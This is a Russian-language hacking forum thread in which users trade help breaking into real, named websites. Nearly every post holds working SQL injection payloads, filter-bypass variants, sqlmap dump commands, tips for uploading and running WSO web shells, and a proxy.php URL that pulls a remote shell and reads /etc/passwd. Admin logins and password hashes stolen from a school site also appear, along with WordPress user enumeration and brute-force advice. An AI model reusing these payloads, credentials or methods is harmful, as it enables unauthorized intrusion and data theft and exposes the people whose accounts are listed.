Cherep said:
Вопрос все еще интересен, совет юзера выше не помог
выдает при таком коде вот что:

Code:
Warning: system() [function.system]: Cannot execute a blank command in тутпуть/wso2.php on line 1



значит шелл залит успешно.. попробуй: wso2.php?cmd=ls, в ответ получишь список файлов

Господа, помогите раскрутить. С меня - миллион благодарностей в любом эквиваленте.


Code:
http://games.onet.ua/index.php?option=com_remository&Itemid=-1&func=;die%28%29;select&id=-1

Я ошибаюсь, или там выполнение кода? Хсс, очевидно. Это, к сожалению, та версия, где еще нет sql в selectcat, исходники этой достать не смог. На том же хосте есть datsogallery, предположительно уязвимая к аплоаду шеллов, но она post-auth, регистрация закрыта, а пасс ни одного из малочисленных юзеров не известен.


Code:
http://games.onet.ua/index.php?option=com_banners&task=archivesection&id=0%27+and+%271%27=%271

Предположительно уязвимая к blind sqli версия com_banners, однако проверить не удалось.


Code:
http://forum.onet.ua/fckeditor/editor/filemanager/browser/default/browser.html?connector=../../connectors/php/connector.php

fckeditor. вроде не позволяет просто так грузить пхп, .htaccess залить также не осилил. могу ошибаться.

Крутится SMF 2.0 RC-3 на пару с tinyportal 1.0-r1.

Как вывести пароль юзера от бд MSSQL?

zombak18 said:
Как вывести пароль юзера от бд MSSQL?


почитай, будет полезно

/thread30501.html

зашел на школьный сайт младшей сестры. нашел скулю.. думал что это blind sql.. но видимо ошибся. Опыт в эксплутации веб - дыр маленький. Прошу совета.. что можно сделать с этой скулей..как хотябы узнать количество таблиц?? потому что все мои запросы скулька игнорит.


http://gs8.ru/articles?m=articles&n=746

Shade said:
зашел на школьный сайт младшей сестры. нашел скулю.. думал что это blind sql.. но видимо ошибся. Опыт в эксплутации веб - дыр маленький. Прошу совета.. что можно сделать с этой скулей..как хотябы узнать количество таблиц?? потому что все мои запросы скулька игнорит.


Итак, отвечу еще раз. Скуля is not so blind. Она в редиректе, интересный случай.

Таблички:


Code:
g8s_2class
g8s_2discipline
g8s_2mark
g8s_2pupil
g8s_a_admin
g8s_a_conf
g8s_a_menu
g8s_a_page
g8s_article
g8s_block
g8s_class
g8s_classhistory
g8s_download
g8s_graduate
g8s_guestbook
g8s_letter
g8s_menu
g8s_news
g8s_newspicture
g8s_pha_picture
g8s_photoalbum
g8s_picture
g8s_pupil
g8s_qa
g8s_timetable
g8s_user
g8s_user2
g8s_v_answer
g8s_v_poll
g8s_v_question

Логин:пасс от админки:


Code:
1 (1)
5 (5)
SV (Dubikova)
zx12 (megaadmin)
23091975 (admin)
354000 (Director)

Хеши:


Code:
admin:4e083bb0bb327b00362f717e42d24f8e
5:e4da3b7fbbce2345d7772b0674a318d5
1:c4ca4238a0b923820dcc509a6f75849b
Dubikova:d38212a0c0e98f678feaaa5a8b9167f5
psy:0af3a5cd53f0ddc6bfd706229be937d1
rde:c2d216144060d7b2b3a08364e50cfa99
Director:0b7f85ee5ac5939661a6517d1a53737a
megaadmin:3b94f9bb839a88ea045b5dc2b77722ad

Сама админка где-то в /admin/, развлекайся, в запросе две колонки.

UPD: и да, там еще где-то валяется fckeditor, возможно бажный.

madhatter said:
Господа, помогите раскрутить. С меня - миллион благодарностей в любом эквиваленте.

Code:
http://games.onet.ua/index.php?option=com_remository&Itemid=-1&func=;die%28%29;select&id=-1

Я ошибаюсь, или там выполнение кода? Хсс, очевидно. Это, к сожалению, та версия, где еще нет sql в selectcat, исходники этой достать не смог. На том же хосте есть datsogallery, предположительно уязвимая к аплоаду шеллов, но она post-auth, регистрация закрыта, а пасс ни одного из малочисленных юзеров не известен.

Code:
http://games.onet.ua/index.php?option=com_banners&task=archivesection&id=0%27+and+%271%27=%271

Предположительно уязвимая к blind sqli версия com_banners, однако проверить не удалось.

Code:
http://forum.onet.ua/fckeditor/editor/filemanager/browser/default/browser.html?connector=../../connectors/php/connector.php

fckeditor. вроде не позволяет просто так грузить пхп, .htaccess залить также не осилил. могу ошибаться.
Крутится SMF 2.0 RC-3 на пару с tinyportal 1.0-r1.


Тут похожу уязвиость не в cms а в плагине remository

Это подтверждает

http://games.onet.ua/index.php?option=com_remository&Itemid=32&func=select&id=0

http://games.onet.ua/components/com_remository/language/

Полазил в сорцах - нигде не слова о версии...

Хз вобщем чем тебе помочь...

Вот единственное что нагуглил но тут скорее всего версия посвежее

http://archives.neohapsis.com/archives/bugtraq/2004-09/0249.html

madhatter said:
Итак, отвечу еще раз. Скуля is not so blind. Она в редиректе, интересный случай.
Таблички:

Code:
g8s_2class
g8s_2discipline
g8s_2mark
g8s_2pupil
g8s_a_admin
g8s_a_conf
g8s_a_menu
g8s_a_page
g8s_article
g8s_block
g8s_class
g8s_classhistory
g8s_download
g8s_graduate
g8s_guestbook
g8s_letter
g8s_menu
g8s_news
g8s_newspicture
g8s_pha_picture
g8s_photoalbum
g8s_picture
g8s_pupil
g8s_qa
g8s_timetable
g8s_user
g8s_user2
g8s_v_answer
g8s_v_poll
g8s_v_question

Логин:пасс от админки:

Code:
1 (1)
5 (5)
SV (Dubikova)
zx12 (megaadmin)
23091975 (admin)
354000 (Director)

Хеши:

Code:
admin:4e083bb0bb327b00362f717e42d24f8e
5:e4da3b7fbbce2345d7772b0674a318d5
1:c4ca4238a0b923820dcc509a6f75849b
Dubikova:d38212a0c0e98f678feaaa5a8b9167f5
psy:0af3a5cd53f0ddc6bfd706229be937d1
rde:c2d216144060d7b2b3a08364e50cfa99
Director:0b7f85ee5ac5939661a6517d1a53737a
megaadmin:3b94f9bb839a88ea045b5dc2b77722ad

Сама админка где-то в /admin/, развлекайся, в запросе две колонки.
UPD: и да, там еще где-то валяется fckeditor, возможно бажный.




" if author else f"


madhatter said:
Итак, отвечу еще раз. Скуля is not so blind. Она в редиректе, интересный случай.
Таблички:

Code:
g8s_2class
g8s_2discipline
g8s_2mark
g8s_2pupil
g8s_a_admin
g8s_a_conf
g8s_a_menu
g8s_a_page
g8s_article
g8s_block
g8s_class
g8s_classhistory
g8s_download
g8s_graduate
g8s_guestbook
g8s_letter
g8s_menu
g8s_news
g8s_newspicture
g8s_pha_picture
g8s_photoalbum
g8s_picture
g8s_pupil
g8s_qa
g8s_timetable
g8s_user
g8s_user2
g8s_v_answer
g8s_v_poll
g8s_v_question

Логин:пасс от админки:

Code:
1 (1)
5 (5)
SV (Dubikova)
zx12 (megaadmin)
23091975 (admin)
354000 (Director)

Хеши:

Code:
admin:4e083bb0bb327b00362f717e42d24f8e
5:e4da3b7fbbce2345d7772b0674a318d5
1:c4ca4238a0b923820dcc509a6f75849b
Dubikova:d38212a0c0e98f678feaaa5a8b9167f5
psy:0af3a5cd53f0ddc6bfd706229be937d1
rde:c2d216144060d7b2b3a08364e50cfa99
Director:0b7f85ee5ac5939661a6517d1a53737a
megaadmin:3b94f9bb839a88ea045b5dc2b77722ad

Сама админка где-то в /admin/, развлекайся, в запросе две колонки.
UPD: и да, там еще где-то валяется fckeditor, возможно бажный.





Спасибо большое)) но вопрос немного в другом заключался.. Я хочу понять как выводить из этой скули информацию.. Т.к она явно отличается от других.. Как выбить нужную информацию без софта?! На мои запросы у скули реакции нет.

Shade said:
Спасибо большое)) но вопрос немного в другом заключался.. Я хочу понять как выводить из этой скули информацию.. Т.к она явно отличается от других.. Как выбить нужную информацию без софта?! На мои запросы у скули реакции нет.


Уязвимый параметр year:


/graduate?year=1957'+and+1=2+union+select+version() +--+


5.1.70-log

Далее на пути стоит sweb, обходите путем изменения регистра.

Фильтруется from

Такой запрос проходит -1%27+/*!union*/+SeLect+1/*!,*/version%28%29/*!,*/3/*!,*/4+--+

Такой не проходит -1%27+/*!union*/+SeLect+1/*!,*/password/*!,*/3/*!,*/4+/*!FrOm*/+--+

Как можно обойти фильтр ?

WallHack said:
Фильтруется from
Такой запрос проходит -1%27+/*!union*/+SeLect+1/*!,*/version%28%29/*!,*/3/*!,*/4+--+
Такой не проходит -1%27+/*!union*/+SeLect+1/*!,*/password/*!,*/3/*!,*/4+/*!FrOm*/+--+
Как можно обойти фильтр ?


1. FRFROMOM

2. POST

2. From находится в связке с union, select, пробелом и т.д.

YaBtr said:
Уязвимый параметр
year
:
5.1.70-log
Далее на пути стоит sweb, обходите путем изменения регистра.


Тьфу, ёпрст, я уж думал это вопрос Ну а раз нет ссылки погуглил, нашел и крутанул сайт


Code:
Красноярский государственный медицинский университет - Клуб выпускников


...бывает)))

П.С. Извиняюсь за офф.топ

GhostW said:
Тьфу, ёпрст, я уж думал это вопрос
Ну а раз нет ссылки погуглил, нашел и крутанул сайт

Code:
Красноярский государственный медицинский университет - Клуб выпускников

...бывает)))
П.С. Извиняюсь за офф.топ


а я как раз думал, кто его похекал... но теперь и логи есть и IP и признание хацкера на форуме, пора подшивать дело!))) начальство и прокуратура будет довольна


GhostW said:
П.С. Извиняюсь за офф.топ


да, не... молодец, все норм)))

winstrool said:
а я как раз думал, кто его похекал... но теперь и логи есть и IP и признание хацкера на форуме, пора подшивать дело!))) начальство и прокуратура будет довольна
да, не... молодец, все норм)))


Админам на почту отписал так что не надо ля-ля...

http://www.sailorjob.com.ua/show_firm/?id=482+order+by+1+--+

Unknowhacker said:
http://www.sailorjob.com.ua/show_firm/?id=482+order+by+1+--+


Что с этим сделать надо?

Если раскрутить, то вот.

http://www.sailorjob.com.ua/show_firm/?id=482%27and(select+1+from(select+count(*),concat ((select+table_name+from+information_schema.tables +limit+0,1),floor(rand(0)*2))x+from+information_sc hema.tables+group+by+x)a)--+g

Почему не выводит имя таблиц(ы)?


Code:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+ from+information_schema.tables+--+

Shade said:
Почему не выводит имя таблиц(ы)?

Code:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+ from+information_schema.tables+--+



http://www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,(select(@x)from(select(@x:=0x00 ),(select(null)from(information_schema.columns)whe re(table_schema!=0x696e666f726d6174696f6e5f7363686 56d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name))))x),3,4,5 ,6,7,8,9,10,11+--+

Shade said:
Почему не выводит имя таблиц(ы)?

Code:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+ from+information_schema.tables+--+



unhex(hex(table_name))

Code:
http://www.muzgid.ua/ru/news/info-42.html

- уязвимое поле поиска.

Unknowhacker said:

Code:
http://www.muzgid.ua/ru/news/info-42.html

- уязвимое поле поиска.




Code:
search_word=w'and(select min(1)from(information_schema.tables)group by concat(version(),0x3b,user(),hex(rand(0))))or'

Кто нибудь знает как залить shell на сайт если можно заливать jpg. gif, файлы и

и создавать новые страницы в html(так сказать ограниченная админка)

SGskam said:
Кто нибудь знает как залить shell на сайт если можно заливать jpg. gif, файлы и
и создавать новые страницы в html(так сказать ограниченная админка)


Играйтесь с расширением и нулл-байтом. Также не забудьте проверить ssi и извращенные php-расширения вроде phtml, php[345] и прочие. К слову, не редко веб-серверы настроены на обработку хтмл интерпретаторами. Проверьте inline-теги разных языков. В конце концов, у вас как минимум уютная активная хсс.

SGskam said:
Кто нибудь знает как залить shell на сайт если можно заливать jpg. gif, файлы и
и создавать новые страницы в html(так сказать ограниченная админка)


Попробуйте изначально заливать файл с расширением php.jpg, позже перехватить запрос, и изменить имя файла на .php.

раскрутил скулю... нашел все логины и пароли юзверей данного сайта... но не вижу пароля админа. В админке сайта вводил первый логин и пароль который показал запрос.. - пишет что введеные данные неверны.. подозреваю что в бд может и не быть логина и пароля админа.. такое быть может?? может быть такое что он не там находится?

Shade said:
раскрутил скулю... нашел все логины и пароли юзверей данного сайта... но не вижу пароля админа. В админке сайта вводил первый логин и пароль который показал запрос.. - пишет что введеные данные неверны.. подозреваю что в бд может и не быть логина и пароля админа.. такое быть может?? может быть такое что он не там находится?


Система самописная? Вполне может, никто не запрещает. Но скорее всего, админы просто в отдельной таблице. Аналогично, никто не говорил, что первый юзер - обязательно админ. В пользовательской табличке может быть циферка, означающая уровень привилегий.

madhatter said:
Система самописная? Вполне может, никто не запрещает. Но скорее всего, админы просто в отдельной таблице. Аналогично, никто не говорил, что первый юзер - обязательно админ. В пользовательской табличке может быть циферка, означающая уровень привилегий.


уровень привелегий??? и у кого эта цифра больше - тот и является админом? можно по подробней?

Shade said:
уровень привелегий??? и у кого эта цифра больше - тот и является админом? можно по подробней?


обычно наоборот, чем меньше тем больше прав

Shade said:
уровень привелегий??? и у кого эта цифра больше - тот и является админом? можно по подробней?


Хотите - и эту доделаем.

Все это варьируется от автора к автору. В простых системах это просто ключ на админское значение в другой табличке. В сложных это может быть какое-нибудь хитрое число для политик доступа.

Названия таблиц в студию. Список колонок в пользовательской табличке в студию.

Code:
http://www.e-portal.com.ua/news.php?id=-11+union+select+1,group_concat%28table_name%29,3,4 ,5,6,7,8,9,10,11,12,13+from+information_schema.tab les+--+

вот впринцепи и сама скуля... только если можно по подробней опишите ваши действия)) буду благодарен

Shade said:

Code:
http://www.e-portal.com.ua/news.php?id=-11+union+select+1,group_concat%28table_name%29,3,4 ,5,6,7,8,9,10,11,12,13+from+information_schema.tab les+--+

вот впринцепи и сама скуля... только если можно по подробней опишите ваши действия)) буду благодарен


Если ты про http://e-portal.com.ua/admin , то там бэйсик авторизация. Данные от неё не хранятся на сервере.

OxoTnik said:
а подробнее расскажи где они хранятся


Ну я имел ввиду в PMA.

kingbeef said:
Если ты про http://e-portal.com.ua/admin , то там бэйсик авторизация. Данные от неё не хранятся на сервере.


даа..ну я это и имел ввиду.. поэтому и спрашивал) спасибо

OxoTnik said:
а подробнее расскажи где они хранятся


Если уж цепляться к словам, то при некотором желании это вполне можно организовать и не хранить от нее данные как минимум на том же сервере.

По скуле: file-прав нет, пичалька. Зато рядом валяются еще какие-то базы, в т.ч. от форума. Там вполне могут быть доступы в админку. Успехов.

залил шелл WSO2 на хост через фтп.. захожу по ссылке а там шелл просит пароль.. кто знает какой пароль? вообще так должно быть? о_О

Shade said:
залил шелл WSO2 на хост через фтп.. захожу по ссылке а там шелл просит пароль.. кто знает какой пароль? вообще так должно быть? о_О


Ну как бы в WSO стоит авторизация.

По умолчанию пароль "root" .

Сабж. Я сейчас устроился на работу помощник сис администратора. Сегодня на почту пришло сообщение со скриншотом


Ваш сайт уязвим, имеется SQL инъкция.




Code:
http://www.ke.kz/ru/Vzaimodejstvie/Media-centr/Events/arch=1/new_y=2014/new_m=2'

Хотел узнать, это действительно СКУЛЬ инъекция?

Yahoooo said:
Сабж. Я сейчас устроился на работу помощник сис администратора. Сегодня на почту пришло сообщение со скриншотом

Code:
http://www.ke.kz/ru/Vzaimodejstvie/Media-centr/Events/arch=1/new_y=2014/new_m=2'

Хотел узнать, это действительно СКУЛЬ инъекция?


Всё и проще и сложнее. Под катом практически весь url енкодинг, но вытащить ещё можно что-либо)


Code:
http://www.ke.kz/ru'and(extractvalue(1,concat(1,user())))or'

Как залить на dle gif картинку с php кодом?

Слышал что можно залить шелл на прямую (без доступа в админку) , если есть скуля... Кто что скажет по этому поводу ?

Имеем скулю

Нужно сдампить mail,pass. Пробую через sqlmap - вот что выходит

http://clip2net.com/s/6P9XZ6

При чем, если дампить отдельно, или mail, или pass то все норм.

Через havij не вариант, он долго думает, особенно при сохранении больших дампов.

Как решить проблему? За ранее спасибо

OxoTnik


Code:
python sqlmap.py -u http://site.com/index.php?i=-1 --dump -D db_name -T table_name -C "column1,column2"

Так зачем скульмап, если можно одним запросом вывести все таблици и колонки.

В принтабельное поле вставляешь.

(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(n ull)%66rom(%69nformation_schema.%63olumns)%77here( %74able_schema!=0x696e666f726d6174696f6e5f73636865 6d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,%63olumn_name))))x )

erwap said:
Имеем скулю
Нужно сдампить mail,pass. Пробую через sqlmap - вот что выходит
http://clip2net.com/s/6P9XZ6
При чем, если дампить отдельно, или mail, или pass то все норм.
Через havij не вариант, он долго думает, особенно при сохранении больших дампов.
Как решить проблему? За ранее спасибо


Кажется разобрался, походу эта трабла возникла из-за неравного кол-ва колонок. Задал параметры start=1 и stop= чуть меньше, чем coun column

Главное что бы теперь ничего не перемешалось

А залиться не получается. Нет прав на запись

WebCruiser хорошо дампить, если он скулю раскрутит

подскажите софт чтоб залить бд себе на машину.. пробовал через havij, но это нереально долго.. какие есть предложения?

Shade said:
подскажите софт чтоб залить
бд
себе на машину.. пробовал через
havij
, но это нереально долго.. какие есть предложения?


И снова здравствуйте. mysqldump, входящий в стандратную поставку mysql-клиента. Если речь о mysql, конечно.

Добрый вечер

Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!

Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(

Shade said:
подскажите софт чтоб залить
бд
себе на машину.. пробовал через
havij
, но это нереально долго.. какие есть предложения?


sqlmap

https://github.com/sqlmapproject/sqlmap/wiki/Usage

-D dbname -T tablename -C columns --dump

CoolHucker said:
Добрый вечер
Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!
Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(


софт раскручивает самые обычные и самые стандартные скули... Если ручками раскручивать скули не умеешь, то и от софта будет не много толку. Возможно какие-то символы фильтруются.. например имя таблицы.. это исправляется зашифровкой имени таблицы в hex. А вообще так сказать сложно..выложи скулю.. тебе скажут в чем проблема

CoolHucker said:
Добрый вечер
Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!
Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(


Брутят, вы не поверите, брутом. Все тупо до безобразия. Фтп как правило тырят ботами с машин. Шеллы массово - через дыры в популярных цмс.

Сканер выкидывайте и учитесь работать руками. Когда сможете написать свой или с первого взгляда описать алгоритм любого такого сканера - тогда и будет толк от их использования.

Допустим есть myadmin/setup/ и вроде есть права на запись config.inc.php. Но при переходе по MyAdmin//config/config.inc.php 404 error. что можно сделать?

lansia said:
Допустим есть myadmin/setup/ и вроде есть права на запись config.inc.php. Но при переходе по MyAdmin//config/config.inc.php 404 error. что можно сделать?


м.б слэш лишний? или путь /etc/phpmyadmin/config.inc.php

Как в sqlmap сделать ,чтоб при сканировании ссылки sqlmap использовал union не такой простой ,а такой /*!union*/

WallHack said:
Как в sqlmap сделать ,чтоб при сканировании ссылки sqlmap использовал union не такой простой ,а такой /*!union*/


Как подсказывает ман:


--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data

Приветствую,вообщем нужно мне подтянуть знания по RFI

Вопрос собственно -как проинклюдить ,почему не получается и как можно решить?

Для примера нашел вот

h**p://careers.ieee.org/test/redesign/proxy.php?url=http://files.xakep.biz/shells/PHP/wso.txt

grimnir said:
Приветствую,вообщем нужно мне подтянуть знания по RFI
Вопрос собственно -как проинклюдить ,почему не получается и как можно решить?
Для примера нашел вот
h**p://careers.ieee.org/test/redesign/proxy.php?url=http://files.xakep.biz/shells/PHP/wso.txt


просто читалка.

http://careers.ieee.org/test/redesign/proxy.php?url=/etc/passwd

http://careers.ieee.org/test/redesign/proxy.php?url=http://www.spenneberg.org/phpinfo.txt

попугай said:
просто читалка.
http://careers.ieee.org/test/redesign/proxy.php?url=/etc/passwd
http://careers.ieee.org/test/redesign/proxy.php?url=http://www.spenneberg.org/phpinfo.txt


Вьехал, тогда буду LFI использовать. Интересно было просто почему команды не выполняются при RFI инклюде.

А читалкой поищу что-нибудь полезное )

http://careers.ieee.org/test/redesign/proxy.php?url=/usr/local/lib/php.ini

grimnir said:
Вьехал, тогда буду LFI использовать. Интересно было просто почему команды не выполняются при RFI инклюде.


Там нет ни RFI, ни LFI. Есть RFR и LFR(Remote File Reading и Local File Reading)

никто не в курсе как через БД joomla найти путь к сайту которому эта БД пренадлежит

Спс парни)Мб кто подскажет как ломают сайты на wordpress. Подбор пасов я так понял-шлак.Попугай,если есть немножко времени для чайника,стукни в скуп gramila48

CoolHucker said:
Спс парни)Мб кто подскажет как ломают сайты на wordpress. Подбор пасов я так понял-шлак.Попугай,если есть немножко времени для чайника,стукни в скуп gramila48


https://github.com/wpscanteam/wpscan

Прогоняешь .получаешь список ошибок которые можно использовать (смотришь там ссылку по уязвимости)

плюс как вариант ставишь опцию --enumerate u получаешь список юзеров,гарантированых и по словарю прогоняешь на дедиках (я через самописный скрипт на питоне для огромной скорости перебора) ,дальше заливка шелла -профит.

Так что перебор не шлак - просто уметь надо ,если французкий сайт- то словарь французкий ну и т.д

grimnir,респектосик плотный

такой вопрос, нужно вывести логин и пасс из таблици через sql inj, проблема в том что htaccess перенаправляет в админку если в адресной строке присудствует слово, admin, ну и таблица естественно также и називается, мб есть у кого какие идеи как вывести данные?

qaz said:
такой вопрос, нужно вывести логин и пасс из таблици через sql inj, проблема в том что htaccess перенаправляет в админку если в адресной строке присудствует слово, admin, ну и таблица естественно также и називается, мб есть у кого какие идеи как вывести данные?


Hex, нет?

та не, если ж я зашифрую в хекс имя таблици из которой делаю выборку то получу синтактическую ошибку

OxoTnik said:
Sex?
Покаж свой запрос
или в ЛС пиши с линком, разберёмся


запрос выглядит так

+and(select+1+from(select+count(*),concat((select+ concat_ws(0x3a,login,pass)+from+admin+limit+0,1),0 x00,floor(rand(0)*2))x+from+information_schema.tab les+group+by+x)a)--+

qaz said:
запрос выглядит так
+and(select+1+from(select+count(*),concat((select+ concat_ws(0x3a,login,pass)+from+
admin
+limit+0,1),0x00,floor(rand(0)*2))x+from+informati on_schema.tables+group+by+x)a)--+


Попробуй подставить имя базы.

database.tables

kingbeef said:
Попробуй подставить имя базы.
database.tables



пробовал, оно именно на admin реагирует, независимо от того где оно стоит и как

парни скиньте мануал по установке wpscan,для тупых)))нашёл что то,но мне не понятно куда писать)?(я чайник(

Здрасте. Скажите вот есть допустим файлик, в windows 7 при открытии ПАПКИ с этим файликом убивается проводник, при открытии папки Total Commander-ом убивается и он, при сканировании этого файла антивирусом Касперским 2014 убивается и антивирус. возможно много где он (файл) вызывает ошибки в работе программ(в других не проверял).То есть он (файл) при обращении к нему вызывает ошибки в этом софте и windows 7, на xp вроде не сработал. Как мне с ним поступить? продасть куда нибуть или что? файл думаю ценный если такие баги вызывает. вызывает ошибку сдесь ntdll.dll

CoolHucker said:
парни скиньте мануал по установке wpscan,для тупых)))нашёл что то,но мне не понятно куда писать)?(я чайник(


Это консольная программа написанная на Ruby.

MaxFast said:
Это консольная программа написанная на Ruby.


Ох, зря ты это. Теперь придется рассказывать, что такое руби, консоль, как оно сочетается, где скачать и как с помощью этого похекать инторнеты.


Здрасте. Скажите вот есть допустим файлик, в windows 7 при открытии ПАПКИ с этим файликом убивается проводник, при открытии папки Total Commander-ом убивается и он, при сканировании этого файла антивирусом Касперским 2014 убивается и антивирус. возможно много где он (файл) вызывает ошибки в работе программ(в других не проверял).То есть он (файл) при обращении к нему вызывает ошибки в этом софте и windows 7, на xp вроде не сработал. Как мне с ним поступить? продасть куда нибуть или что? файл думаю ценный если такие баги вызывает. вызывает ошибку сдесь ntdll.dll


Я вас огорчу - ваши, так сказать, экономические взгляды себя не оправдают, файлик никто не купит. Да и проблема вполне может быть не в нем.

В поле поиска sqli, раскрутить не удается. Что скажите?


PHP:
http://ener-gy.com.ua/search/index.php

madhatter,мб это вам рассказать?!просто что нужно прописать в консоли для установки и запуска.

Прописывал!

# tar xvzf wpscanteam-wpscan-39d8cdd.tar.gz

# cd wpscanteam-wpscan-39d8cdd

CoolHucker said:
madhatter,мб это вам рассказать?!просто что нужно прописать в консоли для установки и запуска.
Прописывал!
# tar xvzf wpscanteam-wpscan-39d8cdd.tar.gz
# cd wpscanteam-wpscan-39d8cdd


ruby ./названиеисполняемогоскрип та

в кали он вроде внедрён)я зашёл в консоль вроде установил ,п пишу команду ruby wpscan.rb —url 'блог' —enumerate u а он мне выдаёт no such file or directory

CoolHucker said:
в кали он вроде внедрён)я зашёл в консоль вроде установил ,п пишу команду ruby wpscan.rb —url 'блог' —enumerate u а он мне выдаёт no such file or directory


Переведи, ну. Перевёл? Путь до wpscan.rb нужно наверно полный указать, не?


Code:
ruby /path/to/script/wpscan.rb -param1 -param2

CoolHucker said:
madhatter,мб это вам рассказать?!просто что нужно прописать в консоли для установки и запуска.
Прописывал!
# tar xvzf wpscanteam-wpscan-39d8cdd.tar.gz
# cd wpscanteam-wpscan-39d8cdd


Мануалы для слабаков написаны?


Code:
Installing on Debian/Ubuntu:

sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev

git clone https://github.com/wpscanteam/wpscan.git

cd wpscan

sudo gem install bundler && bundle install --without test development

Installing on Fedora:

sudo yum install gcc ruby-devel libxml2 libxml2-devel libxslt libxslt-devel libcurl-devel

git clone https://github.com/wpscanteam/wpscan.git

cd wpscan

sudo gem install bundler && bundle install --without test development

Installing on Archlinux:

pacman -Syu ruby

pacman -Syu libyaml

git clone https://github.com/wpscanteam/wpscan.git

cd wpscan

sudo gem install bundler && bundle install --without test development

gem install typhoeus

gem install nokogiri

Installing on Mac OSX:

git clone https://github.com/wpscanteam/wpscan.git

cd wpscan

sudo gem install bundler && bundle install --without test development

er9j6@ said:
В поле поиска sqli, раскрутить не удается. Что скажите?

PHP:
http://ener-gy.com.ua/search/index.php



Как пример

1'and(substr(@@version,1,1))='5 TRUE

1'and(substr(@@version,1,1))='4 FALSE

CoolHucker said:
в кали он вроде внедрён)я зашёл в консоль вроде установил ,п пишу команду ruby wpscan.rb —url 'блог' —enumerate u а он мне выдаёт no such file or directory


в кали он уже прописан в патче, вызывается просто wpscan -u 'http://link/'

d3vel во)+ тебе)Спс всем)

Подскажите ещё рабочий брут для админок(с прокси)

подскажите уязвимости и движка netschool

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"%'' at line 1

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in

www.url.ru/en/search/1'"

при union+select+

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

помогите(

2fed said:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"%'' at line 1
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in
www.url.ru/en/search/1'"
при union+select+
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
помогите(


а так?

www.url.ru/en/search/1'and(1)='1

www.url.ru/en/search/1'and(1)='2

www.url.ru/en/search/1'union(select(1),2,3,4,5)#

BigBear said:
а так?
www.url.ru/en/search/1'and(1)='1
www.url.ru/en/search/1'and(1)='2
www.url.ru/en/search/1'union(select(1),2,3,4,5)#



проверял (( в том то и дело ничего (((

2fed said:
проверял (( в том то и дело ничего (((


а что с extractvalue и updatexml?

YaBtr said:
а что с extractvalue и updatexml?


ничего...

кому тут можно доверится и дать ссылку ?((

что такое shell injection

сканер выдает такую ошибку

/template/?q=1`true`

сказали можно залить шелл таким способом

2fed said:
что такое shell injection
сканер выдает такую ошибку
/template/?q=1`true`
сказали можно залить шелл таким способом


ну раз сказали значит так и есть! зачем тут спрашивать?

лучше у сканера узнай, за одно спроси у него что такое shell injection, мы тут хз если честно.

Konqi said:
ну раз сказали значит так и есть! зачем тут спрашивать?
лучше у сканера узнай, за одно спроси у него что такое shell injection, мы тут хз если честно.



)))) спасибо офигенный ответ)

есть панель в котором можно загрузить аватар юзера. Сервер обрабатывает только jsp файлы. Как при помощи этой панели загрузить шелл? Есть ли вообще шелл на jsp.

Здраствуйте,сканером понаходил даные уязвимости в сайтах,подскажите какие и как реально использовать?

Unencrypted Login Request

Lars Ellingsen Guestbook System Remote Command Execution

Session Not Invalidated After Logout

St.Asik said:
Здраствуйте,сканером понаходил даные уязвимости в сайтах,подскажите какие и как реально использовать?
Unencrypted Login Request
Lars Ellingsen Guestbook System Remote Command Execution
Session Not Invalidated After Logout


Не удержусь напомнить - сканеры моветон.

1)Lars Ellingsen Guestbook System Remote Command Execution

Все подробненько в картинках:

http://www.sans.org/security-resources/malwarefaq/guestbook.php

2) Session Not Invalidated After Logout

Говорит о том что сессия не обрывается после нажатия кнопки выход, вариант дублировать сессию.

3)Unencrypted Login Request - данные при авторизации передаются без шифрования, теоретически можно найти возможность их перехватить.

FraWn

java в чистом виде обрабатывается на стороне клиента в таком случае залить шелл с расширением .js не возможно.

Существует так-же NodeJS, ASP JScript которая обрабатывается на стороне сервера.

Вопрос в том с чем ты именно имеешь дело.

В целом возможность вызывать собственные java сценарии хорошая возможность развить другой вектор атаки например:

http://en.wikipedia.org/wiki/Cross-site_scripting

Надеюсь вопрос не слишком глупый, опыта ноль, но нагуглить ответ затруднительно.

РНР сайт, есть уязвимый запрос вида "select A,B,C,D from TABLE where E=EE and F=FF and G=GG", в результате чего несколько значений результата (допустим А и В) сохраняются в файле, к которому есть доступ на чтение. И есть возможность инъекции в последние два входных параметра (FF и GG). Если убрать все промежуточные шаги, сам запрос отсылается БД через метод @mysql_db_query().

Так вот, насколько сильно можно видоизменить этот запрос (если это возможно, помимо использования по прямому назначению, получая доступ к заданным полям в заданной таблице оригинального запроса)? Можно ли, допустим, проигнорировать оригинальный запрос и сделать другой, к другой таблице и полям, при этом вернув значения результата под именами А и В, чтобы прочесть их из файла? Или хотя бы поменять поля, которые берутся из оригинальной таблицы (с их переименованием под видом А и В).

Rextor, Точно mysql_db_query? Может быть mysql_query?

Да, можно изменить запрос как угодно. Можно передать скрипту свои данные вместо A, B, C, D, получить информацию из этой или других таблиц, получить значения C, D...

XAMEHA said:
Rextor
, Точно mysql_db_query? Может быть mysql_query?


